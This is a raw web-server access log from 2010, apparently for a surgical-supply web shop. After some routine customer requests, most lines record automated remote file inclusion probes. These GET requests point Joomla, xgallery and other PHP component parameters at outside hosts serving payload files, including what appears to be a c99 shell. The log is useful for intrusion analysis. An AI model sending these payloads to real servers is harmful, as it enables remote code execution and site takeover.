220.247.11.218 - - [19/Mar/2010:04:45:47 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:47 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:48 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:48 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:49 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:49 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:49 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5C1CE8780092A502V+M37+ENG HTTP/1.1" 200 77355 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:52 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5C1CE8780092A502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:52 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5C1CE8780092A502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:53 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5C1CE8780092A502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG HTTP/1.1" 200 57448 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:57 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:57 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:57 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:58 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:58 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:58 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:58 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:59 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5281EC5616F8D800A45502V+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
88.84.95.167 - - [19/Mar/2010:04:46:07 -0400] "GET /index.php?pg=http://www.pammo.cz/data/cmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
164.77.228.200 - - [19/Mar/2010:04:46:21 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:46:21 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:46:21 -0400] "GET /logs/access_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:46:21 -0400] "GET /logs/error_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:46:26 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:46:26 -0400] "GET /logs/error_log.Q109112300//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:46:26 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:46:28 -0400] "GET /logs/access_log.Q110031100%20%20//?_SERVER[DOCUMENT_ROOT]=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:46:47 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:46:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:46:47 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:46:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:46:47 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:46:48 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:46:50 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:46:50 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:46:51 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:46:53 -0400] "GET /logs/access_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:46:56 -0400] "GET /logs/access_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:46:59 -0400] "GET /logs/access_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:47:01 -0400] "GET /logs/error_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:47:07 -0400] "GET /logs/error_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:47:07 -0400] "GET /logs/error_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:47:07 -0400] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:47:13 -0400] "GET /logs/error_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:47:17 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:47:17 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:47:17 -0400] "GET /logs/access_log.Q110031200//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:47:18 -0400] "GET /logs/access_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
77.221.130.11 - - [19/Mar/2010:04:47:22 -0400] "GET /index.php?pg=http://elektrik02.el.funpic.org/c99.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
85.119.152.183 - - [19/Mar/2010:04:47:27 -0400] "GET /logs/access_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:47:27 -0400] "GET /logs/error_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:47:21 -0400] "GET /logs/error_log.Q109110400 HTTP/1.1" 200 2627411 "-" "Yandex/1.01.001 (compatible; Win16; I)"
164.77.228.200 - - [19/Mar/2010:04:47:40 -0400] "GET /logs/access_log.Q109080200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:47:40 -0400] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:42 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:42 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:42 -0400] "GET /logs/access_log.Q109082100%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:48 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:48 -0400] "GET /logs/access_log.Q109082100%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:48 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:50 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:50 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:50 -0400] "GET /logs/access_log.Q109082100%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:47:50 -0400] "GET /logs/access_log.Q109120900/?_zb_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:47:50 -0400] "GET /?_zb_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.104.46.66 - - [19/Mar/2010:04:47:50 -0400] "GET /logs/?_zb_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:51 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:51 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:51 -0400] "GET /logs/access_log.Q109082100%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:52 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:53 -0400] "GET /logs/access_log.Q109082100%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:47:53 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:47:53 -0400] "GET /logs/access_log.Q109070300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:47:53 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.217.242.70 - - [19/Mar/2010:04:47:53 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
164.77.228.200 - - [19/Mar/2010:04:47:58 -0400] "GET /logs/access_log.Q109082500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:48:02 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:48:05 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:48:05 -0400] "GET /logs/access_log.Q109070300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:48:05 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:48:07 -0400] "GET /logs/error_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:48:07 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.241.177.123 - - [19/Mar/2010:04:48:11 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:48:12 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:48:12 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:48:13 -0400] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:48:13 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:48:13 -0400] "GET /logs/access_log.Q109101900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:48:13 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:48:18 -0400] "GET /logs/error_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
207.58.161.181 - - [19/Mar/2010:04:48:19 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://networks.kpru.ac.th/smabes/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:48:22 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:48:22 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.179.177.167 - - [19/Mar/2010:04:48:22 -0400] "GET /logs/access_log.Q109101900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
67.195.114.252 - - [19/Mar/2010:04:48:02 -0400] "GET /logs/access_log.Q109122400 HTTP/1.0" 200 2164057 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.179.177.167 - - [19/Mar/2010:04:48:23 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
82.179.244.70 - - [19/Mar/2010:04:48:27 -0400] "GET /logs/access_log.Q110022700%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.197.232.13 - - [19/Mar/2010:04:48:27 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs/icon/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:48:34 -0400] "GET /logs/access_log.Q109080200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
